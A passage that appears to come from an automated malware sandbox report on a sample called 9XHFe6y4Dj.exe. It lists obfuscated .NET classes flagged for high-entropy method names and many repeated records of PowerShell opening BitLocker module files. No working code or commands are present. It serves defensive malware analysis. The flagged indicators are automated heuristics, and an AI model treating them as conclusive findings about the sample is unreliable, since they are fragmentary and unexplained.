High entropy of concatenated method names: 'cJtph8fO9h', 'T6fpp3E6Xb', 'lLlpoZUq1y', 'DNn210Y8YCR9U6Iu0hqt', 'hsUAPKY8NOT4vaq5KKlX', 'vWW1yxYgzOOMMcJJL0Qa', 'RUrl3gY8178THf7PeAat', 'YMop9BwYwh', 'KgYgmmY8pBy2nE65GBgt', 'b4wKH5Y8oH4IVXtUUwjs' |
Source: 9XHFe6y4Dj.exe, FG3G5ox3OK3mZk2lqe2.cs |
High entropy of concatenated method names: 'nCfxZZuyc0', 'FvdxcUQsSM', 'hjXxmBLyuI', 'ORmxy1idPT', 'Dispose', 'xVmfGGYBlHJ9dDtZhlim', 'DwCZPFYBqTAYGTEqpjNF', 'Ajh07tYBP9qlMU2poOYr', 'qSiSoCYBaWCbiLJH62SO', 'cxuETSYBIU5oyxwq07BQ' |
Source: 9XHFe6y4Dj.exe, tiVZ0T4wUHB2hb2JKnh.cs |
High entropy of concatenated method names: 'U1Q4gajXT0', 'mGL48nuhfa', 'cA543wlKSt', 'xET4didKpR', 'OyQ4Z7DEdR', 'kt04cau9bL', 'JaB4m1PjkS', 'JTf4yuO3TB', 'dWQ4VVE5n9', 'vBf4rDg59S' |
Source: 9XHFe6y4Dj.exe, qZEXBcg3xcTMws5yFmP.cs |
High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3' |
Source: 9XHFe6y4Dj.exe, nQOPnvdQWZGskax9j8V.cs |
High entropy of concatenated method names: 'UjdZu2ewMH', 'WBZCAjYf7TQnK1j1kTHO', 'UyoZLuYfsqXA37VLSU4W', 'YHTXb1YfxfAbHJ1IZOeW', 'A3H1ncYfBhGGfstrk97Z', 'kt5', 'X9pdGrmt1w', 'ReadByte', 'get_CanRead', 'get_CanSeek' |
Source: 9XHFe6y4Dj.exe, KoCmuV42bjP5cVjA3f1.cs |
High entropy of concatenated method names: 'XHtYUdkuG5N', 'PwvYUZ62B1Z', 'FRNYUcguKL3', 'gW5YUmxcAWi', 'vBZYUyOnVbG', 'TIlYUVStIXY', 'gqGYUrnsdtq', 'qC2JoYo8tp', 'uDSYU2Mww8i', 'XnsYUCF2rTq' |
Source: 9XHFe6y4Dj.exe, w56OIlnTPHgQNaYV8IP.cs |
High entropy of concatenated method names: 'B24YKO49GBQ', 'AeInXh1t2o', 'lFpYKePGLGL', 'uKYgQBYj8BXapWSCACZx', 'fkLxC9Yj3cRKHbfEyMgL', 'YbChm8YjIbpATVyl16jl', 'TYSgAoYjg4EOc9LwwILc', 'o562fJYjd0FWwi83ufNc', 'poVaocYjZqgZTyWuU76G', 'iHepe8YjcuP2ilJ7uT2U' |
Source: 9XHFe6y4Dj.exe, Ri3sBVQvCnnJAIy1KNt.cs |
High entropy of concatenated method names: 'UDapmsYHLKbNn8dY6um7', 'UkqqdrYHq8iULXSMskrc', 'dr9P2sYHASNNpV7ny46B', 'BjA7c0YHGPuJt0FmkD13', 'method_0', 'method_1', 'UeyQeamSbG', 'RfbQwnepeV', 'MwFQiJBJfk', 'DOBQnct6DH' |
Source: 9XHFe6y4Dj.exe, UEJ2CViFHBmcnPIaOMD.cs |
High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'MEyYKb8D3AO', 'GNBYpkUMcDy', 'yHGKNHYClJ024uUqcgif', 'PXkuxrYCavNgwNw1NS5b', 'pRvXi5YCIXFUwWutNhHS', 't7laClYCgP451eBNFE0M', 'Jnmp0BYC85EToLkJ1fm0' |
Source: 9XHFe6y4Dj.exe, hLVK3U6L9cL7nmWs6H5.cs |
High entropy of concatenated method names: 'mWchNrYVydmGIjNPHHGy', 'wdoSd1YVcnTtQPMBIBy5', 'wJ8h9uYVmdWnbyx6N4QL', 'oK59ZlYVVQ63aohYbNTi', 'KvEuJpkDbh', 'mbqiGQYV2HZrpsejPo6s', 'EJ5i3MYVCch81RZHkQlJ', 'QPUpKHYVjl015FuH0soO', 'FtBDymYVHj2kqtT9r6NO', 'm3lMYpibCO' |
Source: 9XHFe6y4Dj.exe, RFl9fbZftUGU4eKkgds.cs |
High entropy of concatenated method names: 'voMZDbT1Gm', 'k6r', 'ueK', 'QH3', 'TaWZFl5IYp', 'Flush', 'D6CZsXAvaP', 'zo9ZxAeQG1', 'Write', 'iVuZ7tGWbL' |
Source: 9XHFe6y4Dj.exe, m0ppOfajtaIK2icrAFp.cs |
High entropy of concatenated method names: 'zdsa4KtDxn', 'f6XazYZDWb', 'NJVaWre2p6', 'kMNatebLgu', 'nfIakwOGss', 'ilNaEtn0RX', 'MBSa5x51rD', 'TCNaTSV8rv', 'HlJafjdysf', 'NDNaXft6rO' |
Source: 9XHFe6y4Dj.exe, wa6nIYahHoOlxBwYCjW.cs |
High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'YhbaouA0RQ', 'Write', 'MvEaUUDqB2', 'IaPa0P6qTu', 'Flush', 'vl7' |
Source: 9XHFe6y4Dj.exe, pqjyY1oX2kqK83hsEYa.cs |
High entropy of concatenated method names: 'YvToBJbqOi', 'nTyo40BZAb', 'sijoJevSeL', 'SwVozPNq1t', 'AfUU1uNGbt', 'uJWUYIDnNJ', 'dugUNiZB6p', 'CSfRaaYdSXAuLSEnbNfX', 'NKQV8VYdbT66nTDUvPDL', 'iCyVnsYdRLIZgBPskwNm' |
Source: 9XHFe6y4Dj.exe, TfmZxSCmDxZwEihILUs.cs |
High entropy of concatenated method names: 'ad657IYs7vZYppSuFtZ8', 'ySZHL0YsBcYkKxQSALVJ', 'PbGde9YssMNlYctCB1TM', 'f8tbWVYsxdIxeyE1C7Su', 'TUQERbYsf2Z8cnV5uM9B', 'm5ijqYYsXPuujPfhbHTh', 'BLQ5efYsD9I1HkoAEp7m', 'DBbd5eYs5fYFUgxaweMC', 'bIxoY1YsTQ1jv3srqpqc' |
Source: 9XHFe6y4Dj.exe, BamFZCsde8NQLA0dZSw.cs |
High entropy of concatenated method names: 'eKLsc9ltsi', 'QvZsmBvaW4', 'ng0sy2hkTX', 'wOUsVAnr2t', 'E3gsrxaKE2', 'w3os2ywddK', 'KRnsCLIMuV', 'Mlssjcivki', 'reDsHsy0S9', 'kbRsWFqCeq' |
Source: 9XHFe6y4Dj.exe, rkdIIHKaPDjjMHdxDwB.cs |
High entropy of concatenated method names: 'a5cKgS9uv2', 'xiFK8B2IhT', 'z6cK3nKF11', 'NKOKddDrOX', 'Ke3KZg7I8h', 'BJ6Kc0tF1D', 'Up19YVYcf8t6YNmHqZ2C', 'iVNX2BYcXd9U2R1ZWI0n', 'PpuT7OYcDNapPNEXnf4s', 'Drbt7IYcF8uoa5cg3Mor' |
Source: 9XHFe6y4Dj.exe, bV5aOkM9iivGpAZApdd.cs |
High entropy of concatenated method names: 'Dispose', 'XKIMbbArrv', 'FQGMuFW4Lu', 'nWwMMhM8fW', 'Nvi2tBYV4CfaROg7UQyv', 'hFVG6VYVJamw3vwB7igG', 'Q88SWvYVztcZ5e3cd8Qg', 'CsMjmxYr1lR0ntvDF7UM', 'hOA45PYrYfgcH0NsR6oq' |
Source: 9XHFe6y4Dj.exe, VySNmjqW4ssxMi0Bbnd.cs |
High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'vsoqkKVsbE', 'npZqENXMtZ', 'Dispose', 'D31', 'wNK' |
Source: 9XHFe6y4Dj.exe, y3X7V6NoFkfF5gMSi3o.cs |
High entropy of concatenated method names: 'B0JN0wBc3C', 'rC7NKuAo7p', 'vZhN6hWXEs', 'C23NRJLMvl', 'sROOiDYIRC9AqDYKWQwW', 'BLc8DlYIK0Hd1WLavhJI', 'iLo08gYI6xmHeprqg69r', 'BtxrF6YI9chqs5ws6Vqo', 'bsVTVUYISCxPdlwlE3cI', 'u4ORqbYIbJeUAYTiqJxv' |
Source: 9XHFe6y4Dj.exe, UvRUV13KHsRvdaOQN9u.cs |
High entropy of concatenated method names: 'dBC3RgoBwD', 'zW8398C4cK', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'jPP3ScAXUW', 'method_2', 'uc7' |
Source: 9XHFe6y4Dj.exe, ynDMUr3BTbCseUvMTwM.cs |
High entropy of concatenated method names: 'lES3JR7Nld', 'g8u3zsEFhb', 'zMRd1p7RVZ', 'sLodYgc9Ow', 'vRmdNAC8VO', 'VRPdhe0p0s', 'Rpx', 'method_4', 'f6W', 'uL1' |
Source: 9XHFe6y4Dj.exe, tJtcIM6ulchqUBnncjV.cs |
High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'oD6ykRYmy0gELVcfxkwL', 'SRIUoBYmVLLffpElrG8A', 'yTYWwxYmrW57H2YJtuLr', 'LnTjutYm2Bev8xYYG88y' |
Source: 9XHFe6y4Dj.exe, UeFUGvymqoVTmbZPexe.cs |
High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Y1CAu3YDcy8WNN8BYKK6', 'ckH2kTYDmAmNnDsMrmRO', 'wj582OYDyGCsmmpeQNLb' |
Source: 9XHFe6y4Dj.exe, s14PV2IDgn1HpG3lrg6.cs |
High entropy of concatenated method names: 'BhPIssg2pf', 'PKeIxdMCoF', 'xjVI7ZlVH9', 'Q7DIBnlre3', 'wHbI4nW70D', 'imb99pYExBkV7uaFnrSm', 'K5SH3nYEFvvIcaNxHIev', 'x8yQlZYEsFdIpHZ7y3WL', 'uDrbqxYE7icNAGUG2Zrj', 'V5yp9gYEBrNFinublXHV' |
Source: 9XHFe6y4Dj.exe, cLstx8nxQlpwx8fXFBV.cs |
High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'yv4nBCrQgn', 'f0cYKwrs5xs', 'hOggoAYjrW3hTBisuCxp', 'NjmOxcYjycOvkbRDBrsu', 'wwliJGYjVyUDfMqBT84x', 'b79Lk2Yj2lJhkWSnPBva', 'BmIYMvYjCqEgDZ8WSG6L' |
Source: 9XHFe6y4Dj.exe, DTaRuel9hcU7Yb3eaZx.cs |
High entropy of concatenated method names: 'TRklbyLTjR', 'jMDlumEKjA', 'NEVlMdELbX', 'Va0lvCoy1N', 'srvlOKaXqE', 'x0tgWYYknNA0OWvBQ0LR', 'tUGWFUYkwC4Z7gLJoY2I', 'GMv8DRYkiBdoKEBKGpxa', 'xhOVNVYkQmN5PsALtYm8', 'oKSJ6dYkASMcdVPn55MK' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
